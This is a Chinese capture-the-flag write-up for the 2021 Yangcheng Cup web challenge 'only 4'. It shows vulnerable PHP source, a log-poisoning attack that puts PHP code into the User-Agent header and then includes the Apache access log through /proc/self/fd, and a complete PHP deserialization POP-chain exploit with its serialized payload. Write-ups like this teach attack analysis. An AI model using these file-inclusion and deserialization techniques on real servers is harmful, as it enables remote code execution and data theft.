[PHP知识库][羊城杯2021]web wp

only 4

题目页面进去就是源码，传入两个参数一个用来包含，一个来触发反序列化。发现有个secret.php但是无法直接包含。但是由于我一开始并不知道要包含的文件是啥卡了很久。之后就只使用文件包含来非预期解了。

<?php
highlight_file('index.php');
error_reporting(0);
$gwht= $_GET["gwht"];
$ycb= $_GET["ycb"];
if(preg_match("/flag/",$gwht)){
    die('hack' );
}
if(preg_match("/secret/",$gwht)){
    die('hack' );
}
include($gwht);
if(isset($ycb)){
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/Flag/",$value)) {
            die('not hit');
            exit();
        }
    }
    $YCB = unserialize($ycb);
}else{
    echo "what are you doing";
}
?>

用dirsearch扫描网站发现啥也没有，尝试直接包含文件读/proc/self/cmdline发现是apache的服务器，尝试读日志/var/log/apache2/access.log无回显，应该是权限不够。

尝试读取环境变量/proc/self/environ无回显，尝试遍历/proc/self/fd发现error日志和access日志。可以想到使用包含日志getshell但是插入到url中会进行编码无法构造php代码，想到access日志还会记录ua头，尝试将ua头设置成php代码然后包含access日志

/proc/pid/fd 是个目录，包含当前进程打开的每一个文件的文件描述符（file descriptor），这些文件描述符是指向实际文件的一个符号链接
/proc/self/environ 是当前进程的环境变量列表，彼此间用空字符（NULL）隔开；变量用大写字母表示，其值用小写字母表示

继续尝试发现/proc/self/fd/8为access日志，修改ua头为php代码，包含access日志，成功解析phpinfo

成功执行任意php代码直接读取flag，之后ls发现目录中有一个serialize.php文件，分别读取两个文件

直接用base64输出看看

后面其实还有几个考点的都被我跳过了哈哈哈哈

serialize.php，是一个简单反序列化构造pop链，下面我也给出exp，不会反序列化的可以看一下我之前的文章反序列化漏洞

<?php
class start_gg 
{
        public $mod1; 
        public $mod2;
        public function __destruct()
        {
                $this->mod1->test1();
        }
}
class Call 
{
        public $mod1; 
        public $mod2;
        public function test1()
    {
            $this->mod1->test2();
    }
}
class funct 
{
        public $mod1; 
        public $mod2;
        public function __call($test2,$arr)
        {
                $s1 = $this->mod1;
                $s1();
        }
}
class func 
{
        public $mod1; 
        public $mod2;
        public function __invoke()
        {
                $this->mod2 = "字符串拼接".$this->mod1;
        } 
}
class string1 
{
        public $str1;
        public $str2;
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class GetFlag
{

        
        public function get_flag()
        {
                
                echo highlight_file('secret.php');
        }
}
$a = new GetFlag();
$b = new string1();
$b->str1=$a;
$c = new func();
$c->mod1 = $b;
$d = new funct();
$d->mod1 = $c;
$e = new start_gg();
$e->mod1=$d;
echo serialize($e);
//O:8:"start_gg":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}
?>

secret.php，4位命令执行，网上搜也有解法，就是第一步卡住了

<?php
error_reporting(0);
if(strlen($_GET['SXF'])<5){
    echo shell_exec($_GET['SXF']);
}
?>